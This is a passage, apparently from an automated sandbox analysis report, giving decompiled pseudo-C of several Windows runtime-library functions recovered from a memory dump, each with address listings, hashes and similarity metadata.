																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E018CFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E018CFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E018CFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1987b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1987b84 = _t75;
						_t73 = E018AEB70(_t134, 0x1987b60);
						if( *0x1987b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E018AFF60( *0x1987b20);
							}
						}
						goto L5;
					}
				}
			}

















































                0x018cfab0
                0x018cfab2
                0x018cfab3
                0x018cfab4
                0x018cfabc
                0x018cfac0
                0x018cfb14
                0x018cfb17
                0x018cfac2
                0x018cfac8
                0x018cfacd
                0x018cfad3
                0x018cfad3
                0x018cfadd
                0x018cfb18
                0x018cfb1b
                0x018cfb1d
                0x018cfb1e
                0x018cfb1f
                0x018cfb20
                0x018cfb21
                0x018cfb22
                0x018cfb23
                0x018cfb24
                0x018cfb25
                0x018cfb26
                0x018cfb27
                0x018cfb28
                0x018cfb29
                0x018cfb2a
                0x018cfb2b
                0x018cfb2c
                0x018cfb2d
                0x018cfb2e
                0x018cfb2f
                0x018cfb3a
                0x018cfb3b
                0x018cfb3e
                0x018cfb41
                0x018cfb44
                0x018cfb47
                0x018cfb4a
                0x018cfb4d
                0x018cfb53
                0x0190bdcb
                0x0190bdcb
                0x018cfb59
                0x018cfb5b
                0x018cfb5b
                0x018cfb5e
                0x0190bdd5
                0x0190bdd8
                0x00000000
                0x0190bdda
                0x00000000
                0x0190bdda
                0x018cfb64
                0x018cfb64
                0x018cfb64
                0x018cfb67
                0x018cfb6e
                0x018cfb70
                0x018cfb72
                0x00000000
                0x018cfb78
                0x018cfb7a
                0x018cfb7a
                0x018cfb7d
                0x018cfb80
                0x0190bddf
                0x0190bde1
                0x00000000
                0x0190bde3
                0x00000000
                0x0190bde3
                0x018cfb86
                0x018cfb86
                0x018cfb86
                0x018cfb8b
                0x018cfb90
                0x018cfb92
                0x018cfb94
                0x018cfb9a
                0x018cfb9b
                0x018cfba1
                0x0190bde8
                0x0190bdeb
                0x0190bded
                0x0190beb5
                0x0190beb5
                0x0190bebb
                0x0190bebd
                0x0190bec3
                0x0190bed2
                0x0190bedd
                0x0190bedd
                0x0190beed
                0x00000000
                0x0190bdf3
                0x0190bdfe
                0x0190be06
                0x0190be0b
                0x0190be0d
                0x0190be0f
                0x0190be14
                0x0190be19
                0x0190be20
                0x0190be25
                0x0190be27
                0x0190be35
                0x0190be39
                0x0190be46
                0x0190be4f
                0x0190be54
                0x0190be56
                0x0190bef8
                0x0190bef8
                0x00000000
                0x0190be5c
                0x0190be5c
                0x0190be60
                0x00000000
                0x0190be66
                0x0190be66
                0x0190be7f
                0x0190be84
                0x0190be87
                0x0190be89
                0x0190be8b
                0x0190be99
                0x0190be9d
                0x0190bea0
                0x0190beac
                0x0190beaf
                0x0190beb1
                0x0190beb3
                0x0190beb3
                0x00000000
                0x0190bea2
                0x0190bea2
                0x00000000
                0x0190bea2
                0x0190be8d
                0x0190be8d
                0x0190be92
                0x00000000
                0x0190be92
                0x0190be8b
                0x0190be60
                0x0190be3b
                0x0190be3b
                0x0190be3e
                0x00000000
                0x0190be40
                0x0190be40
                0x0190be44
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0190be44
                0x0190be3e
                0x0190be29
                0x0190be29
                0x00000000
                0x0190be29
                0x0190be27
                0x00000000
                0x018cfba7
                0x018cfba7
                0x018cfbab
                0x0190bf02
                0x018cfbb1
                0x018cfbb1
                0x018cfbb8
                0x018cfbbd
                0x018cfbbd
                0x018cfbbf
                0x018cfbbf
                0x018cfbc5
                0x018cfbcb
                0x018cfbf8
                0x018cfbf8
                0x018cfbfa
                0x00000000
                0x018cfc00
                0x018cfc00
                0x018cfc03
                0x00000000
                0x018cfc09
                0x018cfc09
                0x018cfc0f
                0x018cfc15
                0x018cfc23
                0x018cfc23
                0x018cfc25
                0x018cfc27
                0x018cfc75
                0x018cfc7c
                0x018cfc84
                0x00000000
                0x018cfc29
                0x018cfc29
                0x018cfc2d
                0x018cfc30
                0x0190bf0f
                0x00000000
                0x018cfc36
                0x018cfc38
                0x018cfc3b
                0x018cfc41
                0x0190bf17
                0x0190bf19
                0x0190bf48
                0x0190bf4b
                0x00000000
                0x0190bf1b
                0x0190bf22
                0x0190bf24
                0x0190bf26
                0x00000000
                0x0190bf2c
                0x0190bf37
                0x0190bf39
                0x0190bf3b
                0x00000000
                0x0190bf41
                0x0190bf41
                0x0190bf41
                0x0190bf41
                0x0190bf45
                0x00000000
                0x0190bf45
                0x0190bf3b
                0x0190bf26
                0x00000000
                0x018cfc47
                0x018cfc47
                0x018cfc49
                0x018cfcb2
                0x018cfcb4
                0x018cfcb6
                0x018cfcdc
                0x018cfcdc
                0x00000000
                0x018cfcb8
                0x018cfcc3
                0x018cfcc5
                0x018cfcc7
                0x00000000
                0x018cfcc9
                0x018cfcc9
                0x018cfccd
                0x00000000
                0x018cfccd
                0x018cfcc7
                0x00000000
                0x018cfc4b
                0x018cfc4b
                0x018cfc4e
                0x018cfc4e
                0x018cfc51
                0x018cfc51
                0x018cfc54
                0x018cfc5a
                0x018cfc5c
                0x018cfc5f
                0x018cfc61
                0x018cfc63
                0x018cfc65
                0x018cfc67
                0x018cfc6e
                0x018cfc72
                0x018cfc72
                0x018cfc72
                0x018cfc72
                0x018cfc67
                0x018cfc61
                0x00000000
                0x018cfc5a
                0x018cfc49
                0x018cfc41
                0x018cfc30
                0x018cfc27
                0x018cfc03
                0x018cfbcd
                0x018cfbd3
                0x018cfbd9
                0x018cfbdc
                0x018cfbde
                0x018cfc99
                0x018cfc9b
                0x018cfc9d
                0x018cfcd5
                0x018cfcd5
                0x018cfc89
                0x018cfc89
                0x00000000
                0x018cfc9f
                0x018cfc9f
                0x018cfca3
                0x00000000
                0x018cfca3
                0x00000000
                0x018cfbe4
                0x018cfbe4
                0x018cfbe4
                0x018cfbe4
                0x018cfbe9
                0x018cfbf2
                0x00000000
                0x018cfbf2
                0x018cfbde
                0x018cfbcb
                0x018cfbab
                0x018cfc8b
                0x018cfc8b
                0x018cfc8c
                0x018cfb80
                0x018cfb72
                0x018cfb5e
                0x018cfc8d
                0x018cfc91
                0x018cfadf
                0x018cfadf
                0x018cfae1
                0x018cfae4
                0x018cfae7
                0x018cfaec
                0x018cfaf8
                0x018cfb00
                0x018cfb07
                0x018cfb0f
                0x018cfb0f
                0x018cfb07
                0x00000000
                0x018cfaf8
                0x018cfadd

                Strings
                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0190BE0F
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                • API String ID: 0-865735534
                • Opcode ID: 0061991cc3f2b7f38272a0f67fbf9442dd56c61ccdf6a5fdd4bcfc9458d9c0f0
                • Instruction ID: 409cd93add65739b97390d99a51716f2e49fad76829f47b14bc450a1928512df
                • Opcode Fuzzy Hash: 0061991cc3f2b7f38272a0f67fbf9442dd56c61ccdf6a5fdd4bcfc9458d9c0f0
                • Instruction Fuzzy Hash: 95A10575B006168FFB26DB6CC450B7AB7A6AF44B14F04456EEB0ACB681DB34DE01CB80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01892D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                Download Yara Rule
                C-Code - Quality: 63%
                			E01892D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1985350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1987bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E018D97C0();
				}
				if( *0x19879c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x19879c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E018C1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E018B7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0192FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E018D9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E018CE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L018EDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1986901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1986901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E018D9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E018D95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E018B7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E018B7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01917016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0192FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1985350;
							if(_t109 != 0x1985350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0192FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01925720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                0x01892d8a
                0x01892d8a
                0x01892d92
                0x01892d96
                0x01892d9e
                0x01892da0
                0x01892da3
                0x01892da5
                0x01892da8
                0x01892dab
                0x01892db2
                0x018ef9aa
                0x018ef9ab
                0x018ef9ae
                0x018ef9ae
                0x01892db8
                0x01892dc2
                0x018ef9b9
                0x018ef9be
                0x018ef9bf
                0x018ef9bf
                0x01892dcf
                0x018ef9c9
                0x01892dd5
                0x01892dd5
                0x01892dd5
                0x01892dde
                0x01892de1
                0x01892e70
                0x01892e72
                0x01892e72
                0x01892de7
                0x01892deb
                0x01892e7c
                0x01892e83
                0x01892e85
                0x01892e8b
                0x01892e8d
                0x01892e92
                0x01892e92
                0x01892e85
                0x01892df1
                0x01892df7
                0x01892df9
                0x01892df9
                0x01892dfc
                0x01892dff
                0x01892e02
                0x00000000
                0x01892e05
                0x01892e0c
                0x018ef9d9
                0x01892e12
                0x01892e12
                0x01892e12
                0x01892e1a
                0x018ef9e3
                0x018ef9e9
                0x018ef9f0
                0x018ef9f6
                0x018ef9f8
                0x018ef9f8
                0x018ef9f0
                0x01892e23
                0x018efa02
                0x018efa03
                0x018efa05
                0x018efa06
                0x00000000
                0x01892e29
                0x01892e29
                0x01892e2e
                0x01892e34
                0x01892e3e
                0x00000000
                0x00000000
                0x01892e44
                0x01892e47
                0x01892e4d
                0x00000000
                0x00000000
                0x01892e4f
                0x01892e54
                0x00000000
                0x00000000
                0x01892e5a
                0x01892e5f
                0x01892e9a
                0x01892ea4
                0x01892ea5
                0x01892ea8
                0x01892eaf
                0x01892eb2
                0x01892eb5
                0x018efae9
                0x018efaeb
                0x018efaed
                0x018efaef
                0x018efaf7
                0x018efaf8
                0x018efafd
                0x018efaff
                0x018efb04
                0x018efb04
                0x018efaff
                0x01892ec0
                0x01892ec4
                0x01892ec6
                0x01892ec8
                0x018efb14
                0x018efb18
                0x018efb1e
                0x018efb21
                0x018efb21
                0x01892ece
                0x01892ece
                0x01892ece
                0x01892ed7
                0x01892e61
                0x01892e63
                0x018efa6b
                0x018efa71
                0x018efa76
                0x018efa78
                0x018efa8a
                0x018efa7a
                0x018efa83
                0x018efa83
                0x018efa8f
                0x018efa91
                0x018efa97
                0x018efa9d
                0x018efaa4
                0x018efaaa
                0x018efaaf
                0x018efab1
                0x018efac3
                0x018efab3
                0x018efabc
                0x018efabc
                0x018efac8
                0x018efacb
                0x018efadf
                0x018efadf
                0x018efacb
                0x018efaa4
                0x018efa91
                0x01892e6f
                0x01892e6f
                0x01892e5f
                0x018efa13
                0x018efa15
                0x018efa17
                0x018efa1f
                0x018efa21
                0x018efa22
                0x018efa25
                0x018efa28
                0x018efa2f
                0x018efa2f
                0x018efa2a
                0x018efa2a
                0x018efa2a
                0x018efa31
                0x018efa34
                0x018efa36
                0x018efa3c
                0x018efa3e
                0x018efa41
                0x018efa43
                0x018efa45
                0x018efa45
                0x018efa41
                0x018efa3c
                0x018efa4a
                0x018efa4f
                0x018efa51
                0x018efa53
                0x018efa56
                0x018efa5b
                0x018efa5e
                0x00000000
                0x018efa5e
                0x01892e23

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: RTL: Re-Waiting
                • API String ID: 0-316354757
                • Opcode ID: 084f5969fb3352ce5c9e5d44cbd36878947657ebf17576adfe910f5ce735c254
                • Instruction ID: 0ff1b130eab411ce3d4b9e3af4227e81f1072e0ed47c1b9616c6a145b49951f7
                • Opcode Fuzzy Hash: 084f5969fb3352ce5c9e5d44cbd36878947657ebf17576adfe910f5ce735c254
                • Instruction Fuzzy Hash: 01610671A00649AFEB32DF6CC888B7E7BE6EB45718F180659E615DB2C2C7349B008781
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01960EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E01960EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0195FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01961074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E018D9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0195A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0195A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1988b04 >> 0x14) + (_v44 -  *0x1988b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E018B7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0195138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E018B7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0194FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1988724 & 0x00000008) != 0) {
						E019552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E019615B5(0x1988ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                0x01960eb7
                0x01960eb9
                0x01960ec0
                0x01960ec2
                0x01960ecd
                0x0196105b
                0x0196105b
                0x01961061
                0x01961066
                0x01961066
                0x0196106b
                0x01961073
                0x01961073
                0x01960ed3
                0x01960ed6
                0x01960edc
                0x01960ee0
                0x01960ee7
                0x01960ef0
                0x01960ef5
                0x01960efa
                0x01960efc
                0x01960efd
                0x01960f03
                0x01960f04
                0x01960f06
                0x01960f07
                0x01960f09
                0x01960f0e
                0x01960f14
                0x01960f23
                0x01960f2d
                0x01960f34
                0x01960f34
                0x01960f14
                0x01960f52
                0x00000000
                0x00000000
                0x01960f58
                0x01960f73
                0x01960f74
                0x01960f79
                0x01960f7d
                0x01960f80
                0x01960f86
                0x01960fab
                0x01960fb5
                0x01960fc6
                0x01960fd1
                0x01960fe3
                0x01960fd3
                0x01960fdc
                0x01960fdc
                0x01960feb
                0x01961009
                0x01961009
                0x01961015
                0x01961027
                0x01961017
                0x01961020
                0x01961020
                0x0196102f
                0x0196103c
                0x0196103c
                0x01961048
                0x01961050
                0x01961050
                0x01961055
                0x00000000
                0x01961055
                0x01960f88
                0x01960f9e
                0x01960fa2
                0x01960fa9
                0x00000000
                0x00000000
                0x00000000
                0x01960fa9
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: `
                • API String ID: 0-2679148245
                • Opcode ID: df5db7caa70c67db9aeb84ea559ca783dd393437114461ecfb38f733e67b76fe
                • Instruction ID: 6091ea35545fdb4a94084e44e8140e8ecd5856ea3192f874c8c17f67712c6137
                • Opcode Fuzzy Hash: df5db7caa70c67db9aeb84ea559ca783dd393437114461ecfb38f733e67b76fe
                • Instruction Fuzzy Hash: B851AE713043829FE725DF28D980B1BBBE9EBC4714F08492CFA9A97290D770E805C762
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018CF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E018CF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E018B4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E018D9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E018D9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E018D95D0();
							goto L11;
						} else {
							_t109 = L018B4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E018DF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E018D95D0();
										L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                0x018cf0d3
                0x018cf0d9
                0x018cf0e0
                0x018cf0e7
                0x018cf0f2
                0x018cf0f4
                0x018cf0f8
                0x018cf100
                0x018cf108
                0x018cf10d
                0x018cf115
                0x018cf116
                0x018cf11f
                0x018cf123
                0x018cf124
                0x018cf12c
                0x018cf130
                0x018cf134
                0x018cf13d
                0x018cf144
                0x018cf14b
                0x018cf152
                0x0190bab0
                0x0190bab0
                0x018cf158
                0x018cf158
                0x018cf15a
                0x018cf160
                0x018cf165
                0x018cf166
                0x018cf16f
                0x018cf173
                0x0190baa7
                0x0190baa7
                0x0190baab
                0x00000000
                0x018cf179
                0x018cf18d
                0x018cf191
                0x0190baa2
                0x00000000
                0x018cf197
                0x018cf19b
                0x018cf1a2
                0x018cf1a9
                0x018cf1af
                0x018cf1b2
                0x018cf1b6
                0x018cf1b9
                0x018cf1c4
                0x018cf1d8
                0x018cf1df
                0x018cf1e3
                0x018cf1eb
                0x018cf1ee
                0x018cf1f4
                0x018cf20f
                0x0190bab7
                0x0190babb
                0x0190bacc
                0x0190bad1
                0x018cf215
                0x018cf218
                0x018cf226
                0x018cf22b
                0x00000000
                0x018cf22b
                0x018cf1f6
                0x018cf1f6
                0x018cf1f9
                0x018cf1fb
                0x018cf1fb
                0x018cf1f4
                0x018cf191
                0x018cf173
                0x018cf152
                0x018cf203

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                • Instruction ID: 5aa882849b252696784207e0e6f3c5e54acb1e63a6930c5ea86d123a1466bfe6
                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                • Instruction Fuzzy Hash: 66517B715007159FD321DF18C840A6BBBF9BF88710F00492EFA96C7690E774E944CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01913540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E01913540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x198d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
